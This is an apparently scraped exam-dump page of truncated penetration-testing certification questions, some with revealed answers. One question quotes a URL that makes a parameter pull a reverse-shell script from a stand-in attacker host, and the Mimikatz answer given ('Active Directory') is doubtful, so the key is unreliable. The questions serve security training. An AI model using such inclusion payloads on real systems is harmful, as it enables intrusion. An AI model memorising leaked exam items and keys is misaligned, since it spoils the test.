- All Exams Instant Download
Which of the following is the MOST likely reason for the reduced severity?
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report . Which of the following is the MOST likely reason for the reduced severity?A...
For which of the following types of attack would this information be used?
A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?A . Exploit chainingB . Session hijackingC . DictionaryD...
Which of the following are needed to conduct this scan?
A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses . Which of the following are needed to conduct this scan? (Choose two.)A . -OB . -iLC . -sVD . -sSE . -oNF . -oXView AnswerAnswer:...
Given the findings, which of the following should the consultant recommend be implemented?
A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts. Given the findings, which of the following should the consultant...
To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?A . LSASSB . SAM databaseC . Active DirectoryD . RegistryView AnswerAnswer: C
Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?
A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake . Which of the following certificate fields...
Which of the following techniques would be the MOST appropriate?
A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization . Which of the following techniques would be the MOST appropriate? (Select TWO)A . Query an Internet WHOIS database.B . Search posted job listings.C . Scrape the company website.D . Harvest...
Which of the following remediation steps should be taken to prevent this type of attack?
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?A . Implement a blacklist.B . Block URL redirections.C . Double URL encode the parameters.D . Stop external calls from...
Which of the following testing techniques is being performed?
A penetration tester is performing a code review . Which of the following testing techniques is being performed?A . Dynamic analysisB . Fuzzing analysisC . Static analysisD . Run-time analysisView AnswerAnswer: C Explanation: Reference: https://smartbear.com/learn/code-review/what-is-code-review/
Which of the following actions should the penetration tester take?
An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the...
